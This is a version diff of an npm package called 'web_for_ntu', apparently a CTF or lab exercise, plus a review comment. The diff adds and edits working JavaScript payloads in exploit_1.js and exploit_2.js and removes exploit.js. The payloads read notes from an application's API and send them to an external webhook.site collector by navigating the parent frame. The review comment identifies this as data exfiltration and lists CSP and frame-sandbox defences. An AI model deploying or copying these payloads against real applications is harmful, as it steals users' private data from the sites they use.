web_for_ntu 2.0.0 → 3.0.0

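--- a/package/exploit_1.js
+++ b/package/exploit_1.js
@@ -0,0 +1,9 @@
+ function leakAllNote() {
+ fetch('/api/notes/all')
+ .then(response => response.json())
+ .then(notes => {
+ window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?` + encodeURIComponent(notes[0].id);
+ })
+ .catch(error => console.error('Error:', error));
+ }
+ leakAllNote();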
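Review bot: `leakAllNote` (new lines 2–5) reads `/api/notes/all` from whatever origin loads the script and sends `notes[0].id` to a third-party `webhook.site` collector by navigating `window.parent`, yet the file carries no comment saying what it is for or which test target it belongs to. For anyone triaging this package, that is a data-exfiltration payload rather than library code; presumably it is a lab or CTF proof of concept, but nothing on the page confirms that. I would add a header comment such as `// PoC: sends the first note id from /api/notes/all to an external collector via parent-frame navigation`, and treat the `webhook.site` URL on line 5 as the outbound indicator to search for in proxy or DNS logs. On the application side, assuming the script runs inside a frame as the `window.parent` call suggests, the controls it depends on being absent are a `Content-Security-Policy` limiting which scripts may run and a frame `sandbox` that omits `allow-top-navigation`.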
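--- a/package/exploit_2.js
+++ b/package/exploit_2.js
@@ -1,4 +1,4 @@
- function leakDataFromEndpoint() {
+ function leakNoteWithID() {
  fetch('/api/notes?id=a83ed14e-8c1c-43c3-ad7a-b5393ad85a3d')
  .then(response => response.json())
  .then(note => {
@@ -6,4 +6,4 @@ function leakDataFromEndpoint() {
  })
  .catch(error => console.error('Error:', error));
  }
- leakDataFromEndpoint();
+ leakNoteWithID();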
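--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,6 @@
  {
  "name": "web_for_ntu",
- "version": "2.0.0",
+ "version": "3.0.0",
  "description": "test1",
  "main": "exploit.js",
  "scripts": {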
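--- a/package/exploit.js
+++ b/package/exploit.js
@@ -1,10 +0,0 @@
- function leakDataFromEndpoint() {
- fetch('http://10.113.184.121:10082/api/notes/all')
- .then(response => response.json())
- .then(data => {
- const queryParams = new URLSearchParams({data: JSON.stringify(data)}).toString();
- window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?${queryParams}`;
- })
- .catch(error => console.error('Error:', error));
- }
- leakDataFromEndpoint();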